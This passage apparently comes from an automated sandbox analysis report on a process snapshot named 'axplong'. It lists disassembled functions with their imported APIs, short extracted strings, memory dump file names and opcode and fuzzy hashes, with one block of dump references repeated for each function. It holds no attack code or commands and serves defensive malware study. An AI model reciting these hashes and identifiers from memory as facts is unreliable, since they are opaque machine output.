                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A247E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: 'kkd+p$'kkd+p
                        • API String ID: 2659868963-3582003783
                        • Opcode ID: 3ccbeb0b1b7019f32d2b490c868f1d383a1cb35c0b44a941fcb26f425cb68a0f
                        • Instruction ID: 78adb45d3666eaa374bcf80236354b4741612dc2e8ab0c31515f3731081b8118
                        • Opcode Fuzzy Hash: 3ccbeb0b1b7019f32d2b490c868f1d383a1cb35c0b44a941fcb26f425cb68a0f
                        • Instruction Fuzzy Hash: 215189B2A00606DFDB15CF58D8856EABBF6FB08310F24C66AD444EB351EB399981CF54
                        Function 006BCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,006BCE82,?,?,?,?,006BCEB7,?,?,?,?,?,?,006BC42D,?,00000001), ref: 006BCB33
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: bd20197f50ce00a1d9dffe4d32dd82c48d3f47aeebf2bff3a8e338a8e8c095d7
                        • Instruction ID: 3d112fdda333724bde1772e702a67ba8889d19eaeb6ab5d016151c6efb854c0c
                        • Opcode Fuzzy Hash: bd20197f50ce00a1d9dffe4d32dd82c48d3f47aeebf2bff3a8e338a8e8c095d7
                        • Instruction Fuzzy Hash: E9D02232A0213CD3CA212B90AC0C8EDBB1A8F80B303004211E80423320CE51AE818BF4
                        Function 006D7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: bf3c8f558f9a9561c1ebe86408a8a7cb94cf71af10dff4905b8c88cb286c6cac
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: 84519C70E0C7485ADF388A38889A7FEA79B9F91300F18045FD482D7782FA11ED45879B
                        Function 006A4CF0 Relevance: .7, Instructions: 701COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b24c6a30df1f7654235bd64d912a4d4c193f0755c89aa0df0f6e3b8344f9be5
                        • Instruction ID: a85315532734ef0be21ef4b9a8d244a4883923967f37abbfcdc13df0140a5492
                        • Opcode Fuzzy Hash: 7b24c6a30df1f7654235bd64d912a4d4c193f0755c89aa0df0f6e3b8344f9be5
                        • Instruction Fuzzy Hash: 372260B3F515144BDB4CCA9DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648
                        Function 006E6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11c15bec0cee7048244cd351c28e06852c4a3691618471aff2cee09e528847cf
                        • Instruction ID: 293bd7279e55c747ea0b27493e77209d643265cb0b1a1f7fce616a99a8ade61f
                        • Opcode Fuzzy Hash: 11c15bec0cee7048244cd351c28e06852c4a3691618471aff2cee09e528847cf
                        • Instruction Fuzzy Hash: 14B17B71225748CFD718CF29C486BA57BA2FF45364F298658E899CF3A1C335E982CB40
                        Function 006A4AF0 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73a837564ce66f837d98e4525fed35ef2faddfff327918bf73c65429c2f25bc7
                        • Instruction ID: adb4e687e5bbd14e3cf7f32d76c4a7cfb1610cdb0cdce2eee9c0971d46d6c053
                        • Opcode Fuzzy Hash: 73a837564ce66f837d98e4525fed35ef2faddfff327918bf73c65429c2f25bc7
                        • Instruction Fuzzy Hash: FF51B67161D7918FC319CF2D8515236BBE2AFD6200F084A9EE0E687392D774DA44CBA1
                        Function 006E777B Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bcf241eba467c1696b91a68f2fdb85c78c4a2e45728051f4434f1f4e588d0002
                        • Instruction ID: 93db9cf043bc67081a4db14aeb06f8d202e1954d9855a5dd11b9f6bd4ab30dff
                        • Opcode Fuzzy Hash: bcf241eba467c1696b91a68f2fdb85c78c4a2e45728051f4434f1f4e588d0002
                        • Instruction Fuzzy Hash: 3321B673F205394B770CC47E8C5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                        Function 006E765B Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79e784836c8debc653178657ce60aa99c22faabad10f0b81412c65e99b4a8b3c
                        • Instruction ID: a73b807d59b34b055c69596e875c892bf28098b02f495199e163c7cac35fa926
                        • Opcode Fuzzy Hash: 79e784836c8debc653178657ce60aa99c22faabad10f0b81412c65e99b4a8b3c
                        • Instruction Fuzzy Hash: F611CA23F30C255B675C817D8C132BAA6D3DBD824030F433AD826EB384E994DE23D290
                        Function 006E8720 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 4b4308be687afb9c84b448fa61e0c4d97cfc6b567a7b914391d7fda7e672a3ce
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: F011D6772023C14FDE05862FC9B45EEA797EAC532273C4265D0494B758D92399459500
                        Function 006D645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38f4847725409d6a79445db716442eb57e8fe3bcd0d5fc61caf97773013c07de
                        • Instruction ID: ba0defd50fdb41829f2bea1ef4e52b840c7cc59e24bc0018909dd9b28ccad2da
                        • Opcode Fuzzy Hash: 38f4847725409d6a79445db716442eb57e8fe3bcd0d5fc61caf97773013c07de
                        • Instruction Fuzzy Hash: 99E08C31A526086FCE257B54DA1C9887B9BEF15345F00991AFC0846322CB25EC81CA91
                        Function 006DA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: ff0324256ae0cb8bf7f212fdfe2e01f35253d58062e7ce0405e3bd37f3b86210
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 0BE04632915228EBCB15DBC8890498AF2ADEB48B00F15409BB501D3240C270DF00C7D4
                        Function 006B7870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                        Download Yara Rule
                        APIs
                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006B795C
                        • __Cnd_destroy_in_situ.LIBCPMT ref: 006B7968
                        • __Mtx_destroy_in_situ.LIBCPMT ref: 006B7971
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                        • String ID: 'kkd+p$@yk$d+p
                        • API String ID: 4078500453-3556248620
                        • Opcode ID: 73bbcfbb0283a28885d8013f3290a81a4208777fdd1a304cb8d40e5e5915fdb6
                        • Instruction ID: c8b407c609291b9885753d6f6d6cb7ec66510b2cc73e5d0406006c025dcd3e94
                        • Opcode Fuzzy Hash: 73bbcfbb0283a28885d8013f3290a81a4208777fdd1a304cb8d40e5e5915fdb6
                        • Instruction Fuzzy Hash: 1431F4F2A047049FD720EF68D845AAAB7E9EF54310F000A7EE945C7342E771EA94C7A5
                        Function 006D70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 322a8fd755a83e8e93e8ae507b93c58031cfcb84e0066f890807ce62010f3e41
                        • Instruction ID: 6caf99ddc25e1fcb05e157d5267f09de6159ddb20482132122b0c1633e164e8e
                        • Opcode Fuzzy Hash: 322a8fd755a83e8e93e8ae507b93c58031cfcb84e0066f890807ce62010f3e41
                        • Instruction Fuzzy Hash: ED012B37E086172616182419AC126BF179B9B83FB472F012FFA44FB3C1FE44DC028195
                        Function 006A2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
